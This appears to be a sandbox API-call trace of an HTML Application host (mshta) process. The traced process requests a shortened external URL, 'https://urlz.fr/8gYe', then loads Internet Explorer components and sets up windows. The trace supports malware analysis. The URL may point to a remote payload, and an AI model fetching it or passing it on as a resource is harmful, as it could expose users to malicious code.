[0072.995] IUnknown:AddRef (This=0x84c3fc) returned 0xe
[0072.995] IUnknown:QueryInterface (in: This=0x84c3fc, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f540 | out: ppvObject=0x33f540*=0x84c3fc) returned 0x0
[0072.996] IUnknown:Release (This=0x84c3fc) returned 0xe
[0072.996] IUnknown:AddRef (This=0x84c3fc) returned 0xf
[0072.996] IUnknown:QueryInterface (in: This=0x84c3fc, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f244 | out: ppvObject=0x33f244*=0x84c3fc) returned 0x0
[0072.996] IUnknown:Release (This=0x84c3fc) returned 0xf
[0072.996] IUnknown:AddRef (This=0x84c3fc) returned 0x10
[0072.996] IUnknown:AddRef (This=0x84c3fc) returned 0x11
[0072.996] IUnknown:AddRef (This=0x84c3fc) returned 0x12
[0072.996] IUnknown:QueryInterface (in: This=0x84c3fc, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f238 | out: ppvObject=0x33f238*=0x84c3fc) returned 0x0
[0072.996] IUnknown:Release (This=0x84c3fc) returned 0x12
[0072.996] IUnknown:AddRef (This=0x84c3fc) returned 0x13
[0072.996] IUri:GetScheme (in: This=0x84c3fc, pdwScheme=0x86ddc8 | out: pdwScheme=0x86ddc8*=0xb) returned 0x0
[0072.996] IMoniker:IsSystemMoniker (in: This=0x84fff0, pdwMksys=0x33f2a0 | out: pdwMksys=0x33f2a0*=0x6) returned 0x0
[0072.998] IUri:GetSchemeName (in: This=0x84c3fc, pbstrSchemeName=0x33f1f8 | out: pbstrSchemeName=0x33f1f8*="https") returned 0x0
[0072.998] _wcsnicmp (_String1="https", _String2="data", _MaxCount=0x5) returned 4
[0072.998] IUri:GetScheme (in: This=0x84c3fc, pdwScheme=0x33f244 | out: pdwScheme=0x33f244*=0xb) returned 0x0
[0072.998] IUnknown:QueryInterface (in: This=0x84c3fc, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f244 | out: ppvObject=0x33f244*=0x84c3fc) returned 0x0
[0072.998] IUnknown:Release (This=0x84c3fc) returned 0x13
[0072.998] IUnknown:AddRef (This=0x84c3fc) returned 0x14
[0072.999] IInternetSession:CreateBinding (in: This=0x857c00, pbc=0x0, szUrl="https://urlz.fr/8gYe", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0x875f60, dwOption=0x0 | out: ppunk=0x0, ppOInetProt=0x875f60*=0x870040) returned 0x0
[0073.001] IUnknown:QueryInterface (in: This=0x870040, riid=0x748e6078*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0x33f1c8 | out: ppvObject=0x33f1c8*=0x0) returned 0x80004002
[0073.001] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f164 | out: phkResult=0x33f164*=0x328) returned 0x0
[0073.002] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f168 | out: phkResult=0x33f168*=0x324) returned 0x0
[0073.002] RegOpenKeyExW (in: hKey=0x324, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x33f124 | out: phkResult=0x33f124*=0x0) returned 0x2
[0073.002] RegOpenKeyExW (in: hKey=0x328, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x33f124 | out: phkResult=0x33f124*=0x32c) returned 0x0
[0073.002] SHRegGetValueW () returned 0x2
[0073.002] SHRegGetValueW () returned 0x2
[0073.002] RegCloseKey (hKey=0x32c) returned 0x0
[0073.002] RegCloseKey (hKey=0x0) returned 0x6
[0073.002] RegCloseKey (hKey=0x0) returned 0x6
[0073.002] RegCloseKey (hKey=0x328) returned 0x0
[0073.002] RegCloseKey (hKey=0x324) returned 0x0
[0073.002] IUnknown:AddRef (This=0x870040) returned 0x2
[0073.002] IUnknown:QueryInterface (in: This=0x870040, riid=0x748e6158*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x33f20c | out: ppvObject=0x33f20c*=0x870040) returned 0x0
[0073.003] IInternetProtocolEx:StartEx (This=0x870040, pUri=0x84c3fc, pOIProtSink=0x86dd14, pOIBindInfo=0x86dcdc, grfPI=0x10, dwReserved=0x0) returned 0x0
[0073.003] IUnknown:AddRef (This=0x86dd14) returned 0x3
[0073.003] IUnknown:AddRef (This=0x86dcdc) returned 0x4
[0073.003] IUnknown:QueryInterface (in: This=0x86dcdc, riid=0x75ad6f40*(Data1=0xa3e015b7, Data2=0xa82c, Data3=0x4dcd, Data4=([0]=0xa1, [1]=0x50, [2]=0x56, [3]=0x9a, [4]=0xee, [5]=0xed, [6]=0x36, [7]=0xab)), ppvObject=0x33f1b4 | out: ppvObject=0x33f1b4*=0x0) returned 0x80004002
[0073.003] IInternetBindInfo:GetBindInfo (in: This=0x86dcdc, grfBINDF=0x8701b0, pbindinfo=0x8701b8 | out: grfBINDF=0x8701b0*=0x20083, pbindinfo=0x8701b8) returned 0x0
[0073.003] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f110 | out: phkResult=0x33f110*=0x324) returned 0x0
[0073.003] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f114 | out: phkResult=0x33f114*=0x328) returned 0x0
[0073.003] RegOpenKeyExW (in: hKey=0x328, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0d0 | out: phkResult=0x33f0d0*=0x0) returned 0x2
[0073.003] RegOpenKeyExW (in: hKey=0x324, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0d0 | out: phkResult=0x33f0d0*=0x0) returned 0x2
[0073.003] RegCloseKey (hKey=0x0) returned 0x6
[0073.003] RegCloseKey (hKey=0x0) returned 0x6
[0073.004] RegCloseKey (hKey=0x324) returned 0x0
[0073.004] RegCloseKey (hKey=0x328) returned 0x0
[0073.004] IUnknown:AddRef (This=0x86dd14) returned 0x5
[0073.064] IInternetBindInfo:GetBindString (in: This=0x86dcdc, ulStringType=0x2, ppwzStr=0x33e968, cEl=0x100, pcElFetched=0x33f170*=0x100 | out: ppwzStr=0x33e968*="*/*", pcElFetched=0x33f170*=0x1) returned 0x0
[0073.064] CoTaskMemAlloc (cb=0x8) returned 0x873d78
[0073.064] IUnknown:QueryInterface (in: This=0x86dd14, riid=0x75ae97c8*(Data1=0x58dfc7d0, Data2=0x5381, Data3=0x43e5, Data4=([0]=0x9d, [1]=0x72, [2]=0x4c, [3]=0xdd, [4]=0xe4, [5]=0xcb, [6]=0xf, [7]=0x1a)), ppvObject=0x33f170 | out: ppvObject=0x33f170*=0x0) returned 0x80004002
[0073.577] IUnknown:QueryInterface (in: This=0x86dd14, riid=0x75ad61d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x870108 | out: ppvObject=0x870108*=0x86dcd4) returned 0x0
[0073.577] IServiceProvider:QueryService (in: This=0x86dcd4, guidService=0x75ad6b20*(Data1=0x79eac9d2, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x75ad6b20*(Data1=0x79eac9d2, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x87029c | out: ppvObject=0x87029c*=0x86dcd8) returned 0x0
[0073.577] IHttpNegotiate:BeginningTransaction (in: This=0x86dcd8, szUrl="https://urlz.fr/8gYe", szHeaders="Accept-Encoding: gzip, deflate", dwReserved=0x0, pszAdditionalHeaders=0x33e924 | out: pszAdditionalHeaders=0x33e924*="Accept-Language: en-US\r\n") returned 0x0
[0073.577] CreateUri (in: pwzURI="https://urlz.fr/8gYe", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x33e8e8 | out: ppURI=0x33e8e8*=0x84c3fc) returned 0x0
[0073.578] IUnknown:AddRef (This=0x84c3fc) returned 0x19
[0073.578] IUnknown:QueryInterface (in: This=0x84c3fc, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33e840 | out: ppvObject=0x33e840*=0x84c3fc) returned 0x0
[0073.578] IUnknown:Release (This=0x84c3fc) returned 0x19
[0073.578] IUnknown:AddRef (This=0x84c3fc) returned 0x1a
[0073.578] CoTaskMemAlloc (cb=0x32) returned 0x85ed80
[0073.578] IUnknown:Release (This=0x84c3fc) returned 0x19
[0073.578] IServiceProvider:QueryService (in: This=0x86dcd4, guidService=0x75ad6b30*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x75ad6b30*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x8702c0 | out: ppvObject=0x8702c0*=0x86dcd8) returned 0x0
[0073.578] IHttpNegotiate2:GetRootSecurityId (in: This=0x86dcd8, pbSecurityId=0x33e724, pcbSecurityId=0x87028c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33e724*=0x6c, pcbSecurityId=0x87028c*=0x200) returned 0x80004005
[0073.625] IUnknown:Release (This=0x870040) returned 0x4
[0073.625] IUnknown:Release (This=0x84c3fc) returned 0x17
[0073.625] IUnknown:Release (This=0x84c3fc) returned 0x16
[0073.625] IUnknown:Release (This=0x84c3fc) returned 0x15
[0073.625] CoTaskMemFree (pv=0x0)
[0073.625] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x33f4f8 | out: lpCPInfo=0x33f4f8) returned 1
[0073.625] IUnknown:AddRef (This=0x857c00) returned 0x3
[0073.625] IUnknown:AddRef (This=0x84c3fc) returned 0x16
[0073.625] IUnknown:QueryInterface (in: This=0x84c3fc, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f500 | out: ppvObject=0x33f500*=0x84c3fc) returned 0x0
[0073.625] IUnknown:Release (This=0x84c3fc) returned 0x16
[0073.625] IUnknown:AddRef (This=0x84c3fc) returned 0x17
[0073.625] IUri:GetScheme (in: This=0x84c3fc, pdwScheme=0x33f504 | out: pdwScheme=0x33f504*=0xb) returned 0x0
[0073.626] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x748be718, lpParameter=0x8651e0, dwCreationFlags=0x0, lpThreadId=0x8651f4 | out: lpThreadId=0x8651f4*=0x2b0) returned 0x428
[0073.627] GetCurrentThreadId () returned 0xbf4
[0073.627] IUnknown:Release (This=0x84c3fc) returned 0x16
[0073.627] IUnknown:Release (This=0x84c3fc) returned 0x15
[0073.627] IUnknown:Release (This=0x84fff0) returned 0x3
[0073.627] IUnknown:Release (This=0x84c3fc) returned 0x14
[0073.627] IUnknown:Release (This=0x84c3fc) returned 0x13
[0073.627] IUnknown:Release (This=0x84c3fc) returned 0x12
[0073.628] IUnknown:Release (This=0x84fff0) returned 0x2
[0073.628] IUnknown:Release (This=0x84c3fc) returned 0x11
[0073.628] CoTaskMemFree (pv=0x83dc68)
[0073.628] CoTaskMemFree (pv=0x0)
[0073.628] IUnknown:Release (This=0x84c3fc) returned 0x10
[0073.628] CoTaskMemFree (pv=0x83dc30)
[0073.628] GetClientRect (in: hWnd=0x1021a, lpRect=0x33fa1c | out: lpRect=0x33fa1c) returned 1
[0073.628] GetClientRect (in: hWnd=0x1021a, lpRect=0x8331ec | out: lpRect=0x8331ec) returned 1
[0073.628] OffsetRect (in: lprc=0x8331ec, dx=0, dy=0 | out: lprc=0x8331ec) returned 1
[0073.628] OffsetRect (in: lprc=0x8331fc, dx=0, dy=0 | out: lprc=0x8331fc) returned 1
[0073.628] RegisterClassExW (param_1=0x33f538) returned 0xc1d1
[0073.629] CoCreateInstance (in: rclsid=0x748dbf70*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x748dbf60*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x74ccb020 | out: ppv=0x74ccb020*=0x88b118) returned 0x0
[0073.777] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x88b118, aaClassList=0x33f630*=0xc1d1, uSize=0x1) returned 0x0
[0073.778] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc1d1, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x1021a, hMenu=0x0, hInstance=0x74790000, lpParam=0x854f58) returned 0x1021e
[0073.778] GetWindowLongW (hWnd=0x1021e, nIndex=-20) returned 0
[0073.778] SetWindowLongW (hWnd=0x1021e, nIndex=-21, dwNewLong=8736600) returned 0
[0073.778] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x88b118, hWnd=0x1021e, msg=0x81, wParam=0x0, lParam=0x33f204*=8736600, plResult=0x33f07c | out: plResult=0x33f07c) returned 0x1
[0073.778] NtdllDefWindowProc_W () returned 0x1
[0073.778] GetCurrentThreadId () returned 0xbf4
[0073.778] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0073.778] GetCurrentThreadId () returned 0xbf4
[0073.778] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0073.778] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x88b118, hWnd=0x1021e, msg=0x1, wParam=0x0, lParam=0x33f204*=8736600, plResult=0x33f07c | out: plResult=0x33f07c) returned 0x1
[0073.778] NtdllDefWindowProc_W () returned 0x0
[0073.778] GetCurrentThreadId () returned 0xbf4
[0073.778] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0073.778] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x88b118, hWnd=0x1021e, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x33f0c8 | out: plResult=0x33f0c8) returned 0x1
[0073.778] NtdllDefWindowProc_W () returned 0x0
[0073.778] GetCurrentThreadId () returned 0xbf4
[0073.778] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0073.778] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x88b118, hWnd=0x1021e, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x33f0c8 | out: plResult=0x33f0c8) returned 0x1
[0073.778] NtdllDefWindowProc_W () returned 0x0
[0073.778] GetCurrentThreadId () returned 0xbf4
[0073.778] NtdllDefWindowProc_W () returned 0x0
[0073.778] GetClassNameW (in: hWnd=0x1021a, lpClassName=0x33f638, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34
[0073.778] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1
[0073.779] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x88b118, fRestoreLayout=1) returned 0x0
[0073.779] SendMessageW (hWnd=0x1021e, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3
[0073.779] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0073.779] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x88b118, hWnd=0x1021e, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x33f4ec | out: plResult=0x33f4ec) returned 0x1
[0073.779] NtdllDefWindowProc_W () returned 0x3
[0073.779] GetCurrentThreadId () returned 0xbf4
[0073.779] IntersectRect (in: lprcDst=0x33f86c, lprcSrc1=0x8331ec, lprcSrc2=0x8331fc | out: lprcDst=0x33f86c) returned 1
[0073.779] EqualRect (lprc1=0x33f86c, lprc2=0x8331ec) returned 1
[0073.779] InvalidateRect (hWnd=0x1021e, lpRect=0x0, bErase=1) returned 1
[0073.779] IntersectRect (in: lprcDst=0x33f758, lprcSrc1=0x33f758, lprcSrc2=0x33f6f0 | out: lprcDst=0x33f758) returned 1
[0073.779] IntersectRect (in: lprcDst=0x33f758, lprcSrc1=0x33f758, lprcSrc2=0x33f6f0 | out: lprcDst=0x33f758) returned 1
[0073.792] IntersectRect (in: lprcDst=0x33f594, lprcSrc1=0x33f594, lprcSrc2=0x33f564 | out: lprcDst=0x33f594) returned 1
[0073.792] IntersectRect (in: lprcDst=0x883128, lprcSrc1=0x883128, lprcSrc2=0x33f584 | out: lprcDst=0x883128) returned 1
[0073.792] SetWindowPos (hWnd=0x1021e, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1
[0073.792] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0073.792] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x88b118, hWnd=0x1021e, msg=0x46, wParam=0x0, lParam=0x33f84c*=66078, plResult=0x33f6e8 | out: plResult=0x33f6e8) returned 0x1
[0073.792] NtdllDefWindowProc_W () returned 0x0
[0073.792] GetCurrentThreadId () returned 0xbf4
[0073.792] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0073.792] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x88b118, hWnd=0x1021e, msg=0x47, wParam=0x0, lParam=0x33f84c*=66078, plResult=0x33f6e4 | out: plResult=0x33f6e4) returned 0x1
[0073.792] NtdllDefWindowProc_W () returned 0x0
[0073.793] GetCurrentThreadId () returned 0xbf4
[0073.793] SetTimer (hWnd=0x1021e, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000
[0073.793] GetFocus () returned 0x0
[0073.793] EnumChildWindows (hWndParent=0x1021e, lpEnumFunc=0x74ab0a73, lParam=0x33f744) returned 0
[0073.794] GetFocus () returned 0x0
[0073.794] SetFocus (hWnd=0x1021e) returned 0x0
[0073.794] NtdllDefWindowProc_W () returned 0x0
[0073.794] NtdllDefWindowProc_W () returned 0x0
[0073.813] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0073.813] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x74360000
[0074.063] GetProcAddress (hModule=0x74360000, lpProcName="LresultFromObject") returned 0x74362663
[0074.063] LresultFromObject () returned 0xc031
[0074.209] GetCurrentThreadId () returned 0xbf4
[0074.215] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0074.216] GetKeyState (nVirtKey=1) returned 1
[0074.216] GetKeyState (nVirtKey=2) returned 0
[0074.216] GetKeyState (nVirtKey=16) returned 0
[0074.216] GetKeyState (nVirtKey=17) returned 0
[0074.216] GetKeyState (nVirtKey=4) returned 0
[0074.216] GetKeyState (nVirtKey=18) returned 0
[0074.216] GetMessageTime () returned 0
[0074.216] GetMessagePos () returned 0x0
[0074.216] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x88b118, hWnd=0x1021e, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x33f10c | out: plResult=0x33f10c) returned 0x0
[0074.217] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0074.217] GetKeyState (nVirtKey=1) returned 1
[0074.217] GetKeyState (nVirtKey=2) returned 0
[0074.217] GetKeyState (nVirtKey=16) returned 0
[0074.217] GetKeyState (nVirtKey=17) returned 0
[0074.217] GetKeyState (nVirtKey=4) returned 0
[0074.217] GetKeyState (nVirtKey=18) returned 0
[0074.217] GetMessageTime () returned 0
[0074.218] GetMessagePos () returned 0x0
[0074.218] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x88b118, hWnd=0x1021e, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x33eb3c | out: plResult=0x33eb3c) returned 0x0
[0074.218] GetCurrentThreadId () returned 0xbf4
[0074.218] GetCurrentThreadId () returned 0xbf4
[0074.218] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0074.220] GetCurrentThreadId () returned 0xbf4
[0074.220] GetCurrentThreadId () returned 0xbf4
[0074.220] GetCurrentThreadId () returned 0xbf4
[0074.220] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x88b118, hWnd=0x1021e, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x33f4fc | out: plResult=0x33f4fc) returned 0x1
[0074.220] NtdllDefWindowProc_W () returned 0x0
[0074.220] GetCurrentThreadId () returned 0xbf4
[0074.220] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x88b118, hWnd=0x1021e, phIMC=0x33f824 | out: phIMC=0x33f824*=0x801a1) returned 0x0
[0074.220] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x88b118, hWnd=0x1021e, hIME=0x0, phPrev=0x33f824 | out: phPrev=0x33f824*=0x801a1) returned 0x0
[0074.221] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0074.221] GetKeyState (nVirtKey=1) returned 1
[0074.221] GetKeyState (nVirtKey=2) returned 0
[0074.221] GetKeyState (nVirtKey=16) returned 0
[0074.221] GetKeyState (nVirtKey=17) returned 0
[0074.221] GetKeyState (nVirtKey=4) returned 0
[0074.221] GetKeyState (nVirtKey=18) returned 0
[0074.221] GetMessageTime () returned 0
[0074.221] GetMessagePos () returned 0x0
[0074.221] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x88b118, hWnd=0x1021e, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x33f50c | out: plResult=0x33f50c) returned 0x0
[0074.221] GetCurrentThreadId () returned 0xbf4
[0074.221] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0074.221] GetKeyState (nVirtKey=1) returned 1
[0074.221] GetKeyState (nVirtKey=2) returned 0
[0074.221] GetKeyState (nVirtKey=16) returned 0
[0074.221] GetKeyState (nVirtKey=17) returned 0
[0074.221] GetKeyState (nVirtKey=4) returned 0
[0074.221] GetKeyState (nVirtKey=18) returned 0
[0074.222] GetMessageTime () returned 0
[0074.222] GetMessagePos () returned 0x0
[0074.222] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x88b118, hWnd=0x1021e, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x33f50c | out: plResult=0x33f50c) returned 0x0
[0074.222] GetCurrentThreadId () returned 0xbf4
[0074.222] IsOS (dwOS=0x25) returned 1
[0074.222] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f718 | out: phkResult=0x33f718*=0x4b0) returned 0x0
[0074.222] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f71c | out: phkResult=0x33f71c*=0x4b4) returned 0x0
[0074.223] RegOpenKeyExW (in: hKey=0x4b4, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x33f6d8 | out: phkResult=0x33f6d8*=0x0) returned 0x2
[0074.223] RegOpenKeyExW (in: hKey=0x4b0, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x33f6d8 | out: phkResult=0x33f6d8*=0x4b8) returned 0x0
[0074.223] SHRegGetValueW () returned 0x0
[0074.223] RegCloseKey (hKey=0x4b8) returned 0x0
[0074.223] RegCloseKey (hKey=0x0) returned 0x6
[0074.223] RegCloseKey (hKey=0x0) returned 0x6
[0074.223] RegCloseKey (hKey=0x4b0) returned 0x0
[0074.223] RegCloseKey (hKey=0x4b4) returned 0x0
[0074.223] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x73870000
[0075.182] GetVersionExW (in: lpVersionInformation=0x33f224*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x33f224*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0075.182] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x73870000
[0075.182] LoadStringW (in: hInstance=0x73870000, uID=0xb5, lpBuffer=0x33f7a0, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0075.235] LoadStringW (in: hInstance=0x73870000, uID=0xb5, lpBuffer=0x33f800, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0075.235] LoadStringW (in: hInstance=0x73870000, uID=0xb5, lpBuffer=0x33f7ec, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0075.236] CreateUri (in: pwzURI="https://urlz.fr/8gYe", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x33e1d4 | out: ppURI=0x33e1d4*=0x84c3fc) returned 0x0
[0075.236] IUnknown:QueryInterface (in: This=0x84c3fc, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33e1ac | out: ppvObject=0x33e1ac*=0x84c3fc) returned 0x0
[0075.236] IUnknown:Release (This=0x84c3fc) returned 0x12
[0075.236] IUnknown:AddRef (This=0x84c3fc) returned 0x13
[0075.236] IUnknown:Release (This=0x84c3fc) returned 0x12
[0075.236] IUnknown:Release (This=0x84c3fc) returned 0x11
[0075.236] FindResourceW (hModule=0x73870000, lpName=0x1fe, lpType=0x6) returned 0x3bb84d0
[0075.236] LoadResource (hModule=0x73870000, hResInfo=0x3bb84d0) returned 0x3bde53c
[0075.236] LockResource (hResData=0x3bde53c) returned 0x3bde53c
[0075.236] VirtualQuery (in: lpAddress=0x3bde53c, lpBuffer=0x33f37c, dwLength=0x1c | out: lpBuffer=0x33f37c*(BaseAddress=0x3bde000, AllocationBase=0x3900000, AllocationProtect=0x2, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
[0075.236] SizeofResource (hModule=0x73870000, hResInfo=0x3bb84d0) returned 0xe6
[0075.237] RegisterDragDrop (hwnd=0x1021e, pDropTarget=0x74cc96cc) returned 0x0
[0075.237] GetCurrentThreadId () returned 0xbf4
[0075.237] GetCurrentThreadId () returned 0xbf4
[0075.237] GetCurrentThreadId () returned 0xbf4
[0075.237] GetCurrentThreadId () returned 0xbf4
[0075.237] GetMessageW (in: lpMsg=0x33fa5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33fa5c) returned 1
[0075.237] TranslateMessage (lpMsg=0x33fa5c) returned 0
[0075.237] DispatchMessageW (lpMsg=0x33fa5c) returned 0x0
[0075.237] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0075.237] KillTimer (hWnd=0x1021e, uIDEvent=0x1000) returned 1
[0075.242] IUnknown:AddRef (This=0x84c3fc) returned 0x12
